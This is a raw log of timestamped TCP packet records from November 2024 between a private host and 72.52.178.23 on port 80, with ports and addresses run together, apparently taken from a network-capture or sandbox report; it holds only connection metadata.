                                                                                Nov 29, 2024 01:52:06.452703953 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.452795029 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.452821016 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.572534084 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572721004 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572731018 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572738886 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572786093 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572794914 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572807074 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.572829008 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572859049 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.572879076 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.572954893 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.572963953 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.573009968 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.573014975 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.573051929 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.573060989 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.573065042 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.573102951 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.693243027 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.693258047 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.693280935 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.693332911 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.693336010 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.693373919 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.693521023 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.693569899 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.737309933 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.737551928 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.857326984 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.857420921 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.905276060 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.905344963 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.021276951 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.021384954 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.117254019 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.117356062 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.237472057 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.237556934 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.317111969 CET804973272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.320341110 CET4973280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.320380926 CET4973280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.370053053 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.370138884 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.425857067 CET4973480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.440412045 CET804973272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.490231991 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.490253925 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.490298033 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.490312099 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.490463018 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.545933008 CET804973472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.546009064 CET4973480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.546147108 CET4973480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.591523886 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.591587067 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.591630936 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.666069984 CET804973472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.711514950 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.788748026 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.908853054 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:07.908987045 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.909174919 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.909291983 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.909410954 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:07.909450054 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029165030 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029239893 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029251099 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029314995 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029407024 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029422045 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029454947 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029474020 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029491901 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029511929 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029537916 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029555082 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029572010 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029582024 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029644966 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029673100 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029683113 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029690027 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.029726028 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.029726028 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.149770021 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.149801016 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.149818897 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.149827957 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.149885893 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.149914026 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.193228960 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.193392038 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.313263893 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.313375950 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.357228994 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.357292891 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.477284908 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.569313049 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.569434881 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.687855005 CET804973472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.687931061 CET4973480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.691239119 CET4973480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.800637007 CET4973680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.811140060 CET804973472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.817306995 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.817354918 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.869137049 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.869256020 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.920717955 CET804973672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.920795918 CET4973680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:08.937294960 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989275932 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989311934 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989384890 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989397049 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989413977 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989423037 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:08.989468098 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.059854984 CET4973680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.099112988 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.099184036 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.100692034 CET4973580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.179948092 CET804973672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.220581055 CET804973572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.318547010 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.438601017 CET804973772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:09.438678980 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.438774109 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.438805103 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:09.438875914 CET4973780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.847903013 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.967762947 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.054198027 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.174455881 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.174531937 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.180883884 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.180951118 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.180977106 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.181057930 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.300820112 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.300961971 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.300971031 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.300978899 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301019907 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301033974 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301043034 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301048040 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301071882 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301090002 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301114082 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301124096 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301161051 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301187038 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301233053 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301265001 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301274061 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301291943 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301311016 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301337957 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.421066999 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.421080112 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.421127081 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.421137094 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.421139002 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.421191931 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.461359024 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.461450100 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.581506968 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.581612110 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.625293970 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.745286942 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.745367050 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.830022097 CET4974680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.830082893 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.851771116 CET804974672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.851829052 CET4974680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.940902948 CET4974880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.949290037 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.951335907 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.060923100 CET804974872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.064454079 CET4974880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.064665079 CET4974880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.184577942 CET804974872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.411961079 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.531955004 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.532048941 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.532196999 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.532391071 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.532465935 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.532497883 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652031898 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652220011 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652409077 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652419090 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652446985 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652463913 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652507067 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652517080 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652540922 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652556896 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652595997 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652615070 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652651072 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652653933 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652694941 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652702093 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652705908 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652759075 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.773510933 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.773520947 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.773529053 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.773536921 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.773580074 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.773612976 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.814274073 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.814534903 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.934602022 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.936604023 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.981313944 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.101306915 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.101358891 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.249614000 CET804974872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.254440069 CET4974880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.305299997 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.310430050 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.310910940 CET4974880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.430784941 CET804974872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.464154005 CET4975280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.486077070 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.487029076 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.584076881 CET804975272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.584367990 CET4975280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.586007118 CET4975280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.607043982 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607054949 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607109070 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607135057 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607203960 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607213974 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607259989 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607270002 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607311010 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.705897093 CET804975272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.715698004 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.715781927 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.715852022 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.835704088 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.939723015 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.059631109 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.059694052 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.059998989 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.060034037 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.060115099 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.060163021 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.179817915 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180088043 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180138111 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180146933 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180198908 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.180202961 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180239916 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180248976 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.180275917 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.180392981 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180402994 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180412054 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180421114 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180454016 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.180474043 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.180483103 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180494070 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180536032 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.300096989 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.300163984 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.300185919 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.300211906 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.300236940 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.300252914 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.300337076 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.300379038 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.341248035 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.341353893 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.461299896 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.461354017 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.505235910 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.625267029 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.625319958 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.721936941 CET804975272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.722004890 CET4975280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.722062111 CET4975280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.829294920 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.832431078 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.841875076 CET804975272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.848314047 CET4975580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.968282938 CET804975572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.968494892 CET4975580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.968494892 CET4975580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.013331890 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.013513088 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.088445902 CET804975572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252083063 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252111912 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252120018 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252129078 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252137899 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252146959 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252156019 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252166033 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252175093 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252182961 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252192020 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.455785990 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.455998898 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.455998898 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.576061010 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.680464029 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.800432920 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.800498962 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.807667017 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.807710886 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.807790995 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.807980061 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.443434000 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.552797079 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.552897930 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.552989006 CET4976380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.672967911 CET804976372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.782831907 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.838035107 CET804976472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.838373899 CET4976480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.838433027 CET4976480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.902909040 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:25.906394958 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.906521082 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.906553030 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.906605005 CET4976580192.168.2.472.52.178.23
